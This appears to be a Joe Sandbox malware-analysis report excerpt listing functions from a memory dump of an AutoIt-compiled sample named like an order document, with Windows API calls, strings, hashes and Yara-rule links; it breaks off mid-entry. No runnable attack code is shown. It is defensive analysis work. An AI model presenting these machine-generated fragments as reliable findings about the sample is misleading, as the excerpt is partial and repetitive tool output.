API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
Instruction ID: d5ae466aed75c77a4d15beb372450120c68d71961851cf8e8349648a48651166
Opcode Fuzzy Hash: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
Instruction Fuzzy Hash: C8E04F32A022119BD7202FB15C0CB4B3BA9EF55795F118C2CA641D6080DA2884018769

Function 0041B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0041B496
SetTextColor.GDI32(?,000000FF), ref: 0041B4A0
SetBkMode.GDI32(?,00000001), ref: 0041B4B5
GetStockObject.GDI32(00000005), ref: 0041B4BD
GetWindowDC.USER32(?,00000000), ref: 0047DE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 0047DE38
GetPixel.GDI32(00000000,?,00000000), ref: 0047DE51
GetPixel.GDI32(00000000,00000000,?), ref: 0047DE6A
GetPixel.GDI32(00000000,?,?), ref: 0047DE8A
ReleaseDC.USER32(?,00000000), ref: 0047DE95

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
Instruction ID: ebc7ae97a81ee43cd2b7e44fa5307cd1c78914befb32965c7e0958ce0b8f082e
Opcode Fuzzy Hash: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
Instruction Fuzzy Hash: 50E06D31900240AADF216F74EC0DBDD3B22AF51335F04CA2BF669580E2C3754980CB15

Function 0043B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0043B2DF
UnloadUserProfile.USERENV(?,?), ref: 0043B2EB
CloseHandle.KERNEL32(?), ref: 0043B2F4
CloseHandle.KERNEL32(?), ref: 0043B2FC

Part of subcall function 0043AB24: GetProcessHeap.KERNEL32(00000000,?,0043A848), ref: 0043AB2B
Part of subcall function 0043AB24: HeapFree.KERNEL32(00000000), ref: 0043AB32

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
Instruction ID: a739e54aae2a3a9cd22030b7aca237d8105e1b6acd56b05ad55d5797ed03ab16
Opcode Fuzzy Hash: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
Instruction Fuzzy Hash: E7E0BF36505005BBDB013B95DC0885DFB66FF983213108635F615815B1CB32A871EB55

Function 0043DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0043DEAA

Strings

Container, xrefs: 0043DE29
AutoIt3GUI, xrefs: 0043DE22

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: ca8847fd1ad060e74e2d1c31adcd40419983daa2a2df24dd84348ac0e8a226e4
Instruction ID: 91fc25d46138a869cd882b063abef7fe39734953fcc036a09f511b7d2fb85e7c
Opcode Fuzzy Hash: ca8847fd1ad060e74e2d1c31adcd40419983daa2a2df24dd84348ac0e8a226e4
Instruction Fuzzy Hash: 61914B70A006019FDB14DF64D884B6ABBF5FF49714F20846EF84ACB291DB78E841CB68

Function 0044DE7C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

__wcsnicmp.LIBCMT ref: 0044DEFD
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0044DFC6

Strings

LPT, xrefs: 0044DEF7

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 598a02dff186f3820899eeaf1a0de52a070f386c13d5de858f635aa035c2ecad
Instruction ID: 0b6f23551d96c9022520ec810942f55f543a8c3b83785167de973a9dcadea710
Opcode Fuzzy Hash: 598a02dff186f3820899eeaf1a0de52a070f386c13d5de858f635aa035c2ecad
Instruction Fuzzy Hash: E361A071A00214AFDB14DF99C891EAEB7B4BF08310F00406FF956AB391DB78AE44CB59

Function 0044290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00442A72

Strings

I/G, xrefs: 0044297F
I/G, xrefs: 004429FC, 00442A64, 00442A12

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscpy
String ID: I/G$I/G
API String ID: 3048848545-4201233942
Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction ID: 5b5fadca2aca936165ba25b9bf37a07b386b53b8396f083847d400d46c1348b3
Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
Instruction Fuzzy Hash: 9D41F771A00216AAEF24DF85D5419FEB770EF48314F90405BF881B7291DBB89E82C7AC

Function 0041BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0041BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0041BCF3

Strings

@, xrefs: 0041BCE8

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 18e4b89ca3cec7a56c612a8f29846d5dfa5d21973cb2bc6782e476a67999c819
Instruction ID: 7d63771c9e25ddf9183b65e02125f6951521e015d12a80f1151a29abe9b9713c
Opcode Fuzzy Hash: 18e4b89ca3cec7a56c612a8f29846d5dfa5d21973cb2bc6782e476a67999c819
Instruction Fuzzy Hash: AC515B715087449BE320AF15DC85BAFBBECFF94358F414C5EF1C8810A2EBB485A9875A

Function 0044C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 004044ED: __fread_nolock.LIBCMT ref: 0040450B

_wcscmp.LIBCMT ref: 0044C65D
_wcscmp.LIBCMT ref: 0044C670

Strings

FILE, xrefs: 0044C5A5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
Instruction ID: d6fd1d98c24f378f3689914d9611b9600f4530d8b2fd317d4f5c4972b7240fa3
Opcode Fuzzy Hash: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
Instruction Fuzzy Hash: 3241F972A0021ABBDF109AA5DC81FEF77B9DF89704F00407AF605FB181D6789A04C769

Function 0046A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0046A85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0046A86F

Strings

', xrefs: 0046A7C3

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
Instruction ID: 05b9b359a9089e5631400059deb0dd6c5e581389fb3afd8405a1aacd88250687
Opcode Fuzzy Hash: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
Instruction Fuzzy Hash: 17410A74E017099FDB54DF64C880BDABBB5FF09304F10016AE905AB351E774A952CF96

Function 0046975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 0046980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0046984A

Strings

static, xrefs: 004697AA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: be9d15106283f32d73a01d056dae10d86d67e41d4a5f4d5423549244c6423b7e
Instruction ID: d9788c9899c7522218275ab4addd7f73f4a76ae600fffe49f6da806261780b35
Opcode Fuzzy Hash: be9d15106283f32d73a01d056dae10d86d67e41d4a5f4d5423549244c6423b7e
Instruction Fuzzy Hash: 4B318F71510604AADB109F35CC80BFB73ADFF59764F10861EF9A9C7190EA74AC81C769

Function 00445157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004451C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00445201

Strings

0, xrefs: 004451BF

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 183a3dfb3021612d41347649a7ba661f2d13a72c163a7152af6843b21bb45d53
Instruction ID: 5b10929a3873ab4178e6ce3d4b5ff2fbe3bc7aec09b2f3309b6731db4349dc23
Opcode Fuzzy Hash: 183a3dfb3021612d41347649a7ba661f2d13a72c163a7152af6843b21bb45d53
Instruction Fuzzy Hash: 9631E531A00208ABFF24CF99D845B9FBBF4BF45350F14405FE981A62A2D7B89944CF19

Function 0045658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00456608

Strings

, $, xrefs: 00456648
AUTOITCALLVARIABLE%d, xrefs: 004565FA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: 3d7ec60bf93e671b435c0431409a465a58b652291a3d84ae4b3dd8b12e11eab2
Instruction ID: fee805f44d74d647617933fdb8fb0fcedd988ae0d96ca396d508efdd7dfb75b5
Opcode Fuzzy Hash: 3d7ec60bf93e671b435c0431409a465a58b652291a3d84ae4b3dd8b12e11eab2
Instruction Fuzzy Hash: 11218671A00114ABCF14EF55C881FEE77B4AF45305F51046FF805AB182DB78E949CBA9

Function 004693CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00469467

Strings

Combobox, xrefs: 00469429

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
Instruction ID: 0958ac638f35600e6680e70f277b7a25b188f367ae3316ed6a952ac5d0afe81a
Opcode Fuzzy Hash: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
Instruction Fuzzy Hash: AC11B6713042087FEF119F54DC80EBB376EEB483A4F10012AF91497390E6799C528769

Function 0046DA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

GetActiveWindow.USER32 ref: 0046DA7B
EnumChildWindows.USER32(?,0046D75F,00000000), ref: 0046DAF5

Strings

T1E, xrefs: 0046DAFB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1E
API String ID: 3814560230-1411378643
Opcode ID: dc6795ed03029fcc1276c237ff838b1bdfa8bc71b832531143d7701350fa4869
Instruction ID: b376bbb36164a2b249426f57df503e6500b549dd451f859ab6e5aac0eec2682c
Opcode Fuzzy Hash: dc6795ed03029fcc1276c237ff838b1bdfa8bc71b832531143d7701350fa4869
Instruction Fuzzy Hash: E5213B79B04201DFC754DF68D850AA673E5EB5A320F25062EF86A873E1E734A850CB69

Function 004698FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8

GetWindowRect.USER32(00000000,?), ref: 00469968
GetSysColor.USER32(00000012), ref: 00469982

Strings

static, xrefs: 00469945

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
Instruction ID: 298e3bd79bdac7eea84c9a0c33d59882faeeb666d7678b2b6b60e360f338a6ae
Opcode Fuzzy Hash: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
Instruction Fuzzy Hash: F51159B2510209AFDB04DFB8CC45AFA7BA8FB08304F040A2DF955E2250E778E851DB64

Function 00469617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00469699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004696A8

Strings

edit, xrefs: 0046967D

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
Instruction ID: 079201cb152505e4b2648a84ffa414ebecf0272cf0d9648ea889d6aacb27be9d
Opcode Fuzzy Hash: c86d9eb9ffc1d426f222cee146d04e483dea2355f225b7c887d0f75077ba98af
Instruction Fuzzy Hash: 7F118CB1500208ABEF105F64DC40EEB3B6EEB05378F50472AF965932E0E7B9DC51976A

Function 00445262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004452D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 004452F4

Strings

0, xrefs: 004452CE

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
Instruction ID: 4aa882214851b6137429ad84dca8c1b776e6d3ce1b64bb11d89768716e185c9b
Opcode Fuzzy Hash: 5f1f7562660535dd0787f45482b6577770730e5d2864a594714d20415fe06af5
